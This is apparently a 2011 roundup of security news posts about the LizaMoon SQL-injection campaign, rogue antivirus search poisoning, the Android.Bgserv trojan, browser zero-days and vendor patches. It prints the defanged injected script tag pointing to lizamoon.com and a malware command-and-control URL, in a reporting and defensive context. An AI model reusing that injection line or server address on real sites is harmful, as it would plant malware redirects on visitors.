Chris Mosby at myITforum.com

Websense Security Labs and the Websense Threatseeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.

The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page:

<script src=hxxp://lizamoon.com/ur.php></script>

According to a Google Search, over 28,000 226,000 URLs have been compromised. This includes several iTunes URLs, as you can see below:

And here is the injected code at one of those iTunes URLs:

The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple.

The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site: hxxp://defender-uqko.in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet.

The domain lizamoon.com was registered three days ago with clearly fake information:

We'll keep monitoring this mass-injection attack and provide updated information as it's available.

UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.

UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon.com.

Websense warns about Lizamoon
Share |
Published: 2011-03-31,
Last Updated: 2011-03-31 17:54:17 UTC
by Joel Esler (Version: 1)
0 comment(s)

This article over on the Websense blog is warning about a new mass sql-injection attack that they have dubbed "Lizamoon". (As that's the domain that the sql injection attack is referring people to.)

By searching for the string in Google, an estimated 226,000 sites have been attacked and defaced with this method. (We know that the numbers from Google aren't accurate, we are putting them there to display the size of the attack -- BIG.)

While I don't necessarily agree with the title of the article (implying that iTunes is infected), this attack and the Mysql attack from earlier this week are just more examples of how there isn't enough emphasis put on preventing sql injection.



-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

Samsung laptops may have spyware pre-installed just for you!
Share |
Published: 2011-03-31,
Last Updated: 2011-03-31 15:19:23 UTC
by Joel Esler (Version: 2)
6 comment(s)

Update: Or not. :( Yes, we have also seen the stories from F-Secure and GFI Sunbelt. This was apparently a false positive that wasn't thoroughly investigated before it hit the wires. In this case, simply because the directory existed, the "aggressive" signature was triggered. All of the standard security software that we use (A/V, IDS, etc.) is subject to false positives, but I guess the real question this poses for us as a community is how good a job are we doing in the follow up and confirming what our software is telling us.

---------------------------------------------------------------------------------------------------------------

Looking at this article that I received from a reader this morning (thanks Bill!) over on MSNBC (A news agency which is a joint venture in between Microsoft and NBC), a security researcher claims that Samsung is installing the Keylogging software "StarLogger" into new Samsung laptops.

Samsung, according to the article blames Microsoft initially, only to back that out and claims it's installed to "monitor the performance of the machine and to find out how it is being used."

Naturally, if this is true, it's not a good thing.

So let's put a call out to our readers. Apparently this software puts itself in "C:WindowsSL". So if you have a Samsung laptop, let us know at the contact link if that directory exists. If it does, this is wrong, and we need to emphasize that this type of thing isn't acceptable to these manufacturers.

Remind anyone of the Sony "rootkit" from a couple years ago?

As I have suspected for a while now, I was just informed that I will not be renewed as an MVP for Configuration Manager on April 1st.

It has been great working all of the MVP's and Microsoft off and on over the years.  Who knows, maybe I will be back someday.

In the meantime, things around here go on as usual, the struggle to keep things up and running continues.

0 comment(s)

2 comment(s)

Performance and security enhancements of Internet Explorer 9 make the browser upgrade worth one's consideration. If you need to rollback to the installation of IE 9 for whatever reason, you shouldn't have any issues. I tested the IE 9 uninstall process to revert a Windows 7 system to when it had Internet Explorer 8 installed.

You can uninstall Internet Explorer 9 by using the "Uninstall a program" applet in Control Panel. Then, select "View installed updates".

Then, select "Windows Internet Explorer 9" from the list and click "Uninstall." After the removal process, Windows will probably prompt you to reboot.

After the reboot, you should have Internet Explorer 8 back in its full glory.

-- Lenny Zeltser

Lenny Zeltser leads a security consulting team and teaches how to analyze and combat malware. He is active on Twitter and writes a daily security blog.

Google Working with Microsoft to Curb MHTML Exploit - Security - News & Reviews - eWeek.com

Google Working with Microsoft to Curb MHTML Exploit

Google noticed an increase in attacks on Microsoft Windows and Internet Explorer machines and is working with its rival to mitigate the MHTML exploit, which targets political activists.

#ArticleWidgets { font-family: Arial,Verdana,Helvetica,sans-serif; font-size: 11px; text-decoration: none; margin-bottom: 0px; }#ArticleWidgets { color: rgb(0, 51, 153); text-decoration: none; line-height: 16px; }#ArticleWidgets.a, articlewidgets.a:hover { color: rgb(0, 51, 153); text-decoration: underline; line-height: 16px; }#position { padding: 5px 0px 5px 5px; }#spacer { height: 5px; line-height: 5px; }.add2head_new { font-size: 11px; font-weight: bold; width: 200px; margin-left: 8px; margin-right: 8px; display: block; float: right; }.ArticleWidgetsHeadline { font-size: 11px; font-weight: bold; } Google said it is working with Microsoft to patch a hole in the Windows operating system hackers are trying to exploit to target activists, among other users. The search engine, which called the attacks "highly targeted and apparently politically motivated," said the perpetrator(s) abuses a known vulnerability Microsoft treated with a temporary patch in late January. The bug lies in the MHTML (MIME Encapsulation of Aggregate HTML) protocol handler on Windows XP and later Windows versions, and is exploited as a cross-site scripting attack when users surf the Web with Microsoft's Internet Explorer browser. An attacker could leverage the hole by writing an HTML link designed to trigger a malicious script and convince the targeted user to click it. The exploit can be used to run JavaScript code on IE, giving an attacker a way to access user information stored in the browser and trick users into installing malicious code. Microsoft issued this fix for the security flaw in January, but  the flaw is being used to target political activists and even users on at least one popular social Website, Google said. Google's security engineers recommend users, including businesses whose computers use IE, run Microsoft's Fixit solution on their computers to block this attack until permanent patch is available. For its part, Google said it has set up several server-side defenses to protect users of its own Web services against the MHTML exploit. "That said, these are not tenable long-term solutions, and we can't guarantee them to be 100 percent reliable or comprehensive," Google's security team wrote in a blog post March 11. "We're working with Microsoft to develop a comprehensive solution for this issue." That Google is working directly with rival Microsoft is a testament to the seriousness of the issue. Rivalries tend to get placed on the backburner where computer security is concerned, but the joint effort certainly underscores the companies' shared concern. Indeed, Google said the abuse of this vulnerability represents a new quality in the exploitation of Web-level vulnerabilities. The company said such attacks previously focused on directly compromising users' systems, as opposed to leveraging vulnerabilities to interact with web services.

Adobe Flash 0-day being used in targeted attacks
Share |
Published: 2011-03-14,
Last Updated: 2011-03-14 20:04:11 UTC
by Bojan Zdrnja (Version: 1)
Rate this diary:
0 comment(s)

Adobe posted a security advisory (http://www.adobe.com/support/security/advisories/apsa11-01.html) about a new 0-day vulnerability in Flash reader. According to the post about this vulnerability (available at http://blogs.adobe.com/asset/2011/03/background-on-apsa11-01-patch-schedule.html), Adobe says that they had reports of this new vulnerability being used in targeted attacks. These attacks seem to be particularly sneaky – the Flash exploit is embedded in an Excel file which is also used to setup memory so the exploit has a higher chance of succeeding.

We will keep an eye on this and if the 0-day starts being used in the wild. If you have more information that you can share about this let us know.

A lot of people are still surprised how quickly bad guys catch up with events in the real world - this is especially true for the RogueAV/FakeAV groups which constantly poison search engines in order to lure people into installing their malware.

We can also see even many AV vendors warning people to be careful when they search for this or that (currently, obviously the search query that generates most attention is related to the disaster in Japan). While it is good to constantly raise awareness and warn people about what’s happening, one important thing to know is that the RogueAV/FakeAV guys poison search engines and modify their scripts automatically. This means that they are constantly on top of current trends and events in the world – whatever happens, their scripts will make sure that they “contain” the latest data/information about it.

Back last year I wrote two diaries explaining how a certain RogueAV/FakeAV group works; if you haven’t seen them before I’d strongly recommend that you take a look, they are available at:

http://isc.sans.edu/diary.html?storyid=9085
http://isc.sans.edu/diary.html?storyid=9103

There are many RogueAV/FakeAV groups so the analysis posted above just concerns one of them (it’s interesting to see that they are still very much active).

With the disaster in Japan striking on Friday we saw another RogueAV/FakeAV group heavily poisoning the search engines – even Google which normally removes them quickly still contains hundreds of thousands of such pages. Since this campaign can be easily identified, here is what the current count says:

Yes, 1.7 million pages (!!!). Keep in mind that there are multiple pages listed here with different search terms (they modify search terms through a single parameter), but the number is still staggering. According to Google, in past 24 hours there have been 14,200 such pages added so it’s clear that the bad guys are very active.

This RogueAV/FakeAV group uses different code than the one I previously analyzed. They actually drop pretty interesting, self modifying PHP code.
The code contains a list of current searches/trends. The list contains hundreds of such keywords, some of which are shown below:

$lastquery = "<keys>cee-lo-green-grammyswhat-chilli-wants-finale … japan-tsunami-newsokinawa-japan-tsunami-2011tsunami-and-earthquake-in-japan</keys>";

Notice how the list is delimited by <keys> tags. This allows the owner of the script to automatically update the keywords the script will react to – by using a special parameter to identify himself, the owner can submit a new keyword and the script will modify itself by adding this parameter if it hasn’t been found in the $lastquest list before:

Same function is used if Google’s or another search engine’s bot visit’s the web page – the main script check’s the user agent that was submitted and even has a list of networks that can help the script owner identify “visitors” he or she does not want to get redirected to the final site hosting RogueAV.

But this is not all. When visited by a search engine’s bot, the script (among the other things) tries to create a very legitimate looking web page that should help poison the search engine. In order to create this legitimate looking web page, the script automatically queries Google to see related searches for the current search query (the hottrends web page at Google). Besides Google it will also use Yahoo to search for new pages and, what’s probably the most interesting, will retrieve images from Google images that are related to the same query term!

This way the RogueAV/FakeAV guys can create very realistic pages that can, unfortunately as we’ve all witnessed, successfully poison search engines.

(to be continued)

Japan Earthquake: Possible scams / malware

Share |

Published: 2011-03-11,
Last Updated: 2011-03-11 13:29:49 UTC
by Guy Bruneau (Version: 1)

Rate this diary:

0 comment(s)

There will probably be some emails scams and malware circulating regarding the recent Japanese earthquake that occurred overnight. If you receive such emails, could you provide samples using our contact form?

Be aware off

Fraudulent Organizations: If possible, donate to organizations you know and trust, not to new organizations just set up for this particular event. The IRS maintains a list of tax exempt charitable organizations [1]. This list is not 100% up to date, and it takes a while for a new organization to be added. But it can serve as a first sanity check.

Malware: Malware may be advertised as a video report of the event or come under other pretenses.

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

Following our initial post on the discovery of Android.Bgserv, Symantec has found additional Trojanized samples in the wild. After analysis of these new samples, it appears that the applications contain multiple bugs. In the case of the Trojanized version of Google’s Security Tool, we have confirmed after testing (with no surprise) that it does not have the ability to clean a system infected with Android.Rootcager.

The Trojanized applications also contain code to change an infected device’s APN settings. The screenshot below belongs to the threat code responsible for changing them. However, in our research we have not been able to identify the code being called at any time.
 

Our research also shows that even if this APN change code was called, the application's permissions would not allow the requested changes to take place. This can be seen in the screenshot below, showing the Trojanized application's manifest:  

An application willing to change the APN settings is required to hold the “android.permission.WRITE_APN_SETTING” permission. We have also found some other pieces of interesting code within the threat that seem to be dormant. One example of this is seen in the screenshot below:

The purpose of this code seems to be to block incoming calls from specific telephone numbers. In this case, the telephone numbers in question seem to belong to a major Chinese telecom operator's customer care service.  

Below is an image showing the command-and-control (C&C) server that is being used by this threat and an example of the information that is posted to the C&C server. At the time of writing, the C&C server was live but not serving commands.
 

Our overall analysis of this threat has shown it to be a potentially worrying threat. However, the threat's perpetrators have failed to fully implement all of the functionality within the infected applications, thereby lessening its potential impact as a threat.    

Here are a few tips that may help to identify whether or not a device has been infected with Android.Bgserv. The legitimate Android Security tool was automatically pushed to infected users and did not require manual download.  Also, it does not show up within the application menu, as opposed to the malicious one:

We can see the malicious service that has been started by the Trojanized tool running in the background as “BgService”:

Finally, to avoid becoming a victim of such malicious Android applications, we recommend that you only use regulated Android marketplaces for downloading and installing Android applications. Also, in the Android OS application settings there is an option to stop the installation of non-market applications, which can help to prevent against this type of attack. Checking user comments on the marketplace can also assist in determining if the application is safe. Lastly, always check the access permissions being requested during the installation of any Android applications. If they seem excessive for what the application is designed to do, it would be wise to stop installing the application.

Note: Special thanks to Irfan Asrar for all his input into this blog.

On March 6,2011, Google published the application “Android Market Security Tool”, a tool designed to undo the side effects caused by Android.Rootcager. This application was automatically pushed to devices of users who had downloaded and installed infected applications.

Symantec has identified suspicious code within a repackaged version of the “Android Market Security Tool”. This package was found on an unregulated third-party Chinese marketplace. This threat seems to be able to send SMS messages if instructed by a command-and-control server located at the following address:

hxxp://www.youlubg.com:81/Coop/request3.php

Analysis of the application is still ongoing, however, what is shocking is that the threat’s code seems to be based on a project hosted on Google Code and licensed under the Apache License:

http://code.google.com/p/mmsbg/

Here are a few snippets taken from Google’s hosted project:

We have added detection for the trojanized version of Google’s application as Android.Bgserv.

iOS 4.3 released, numerous security vulnerabilities patched
Share |
Published: 2011-03-10,
Last Updated: 2011-03-10 08:32:30 UTC
by Bojan Zdrnja (Version: 1)
Rate this diary:
0 comment(s)

Apple released a new version of iOS for iPhone, iPad and iPod Touch devices. Besides some new features that are being introduced with this release of iOS, Apple also patched a number of security vulnerabilities.

You can see the whole list at http://support.apple.com/kb/HT4564 - some of these are really low risk but if you scroll down to Webkit fixes, you can see that Apple patched 49 (!!!) security vulnerabilities that, according to Apple “may lead to an unexpected application termination or arbitrary code execution” (in other words: having your device pwned).

While we are not aware of exploits of these vulnerabilities being abused, it’s always better to be safe and update your i* devices as early as you can.

--
Bojan
INFIGO IS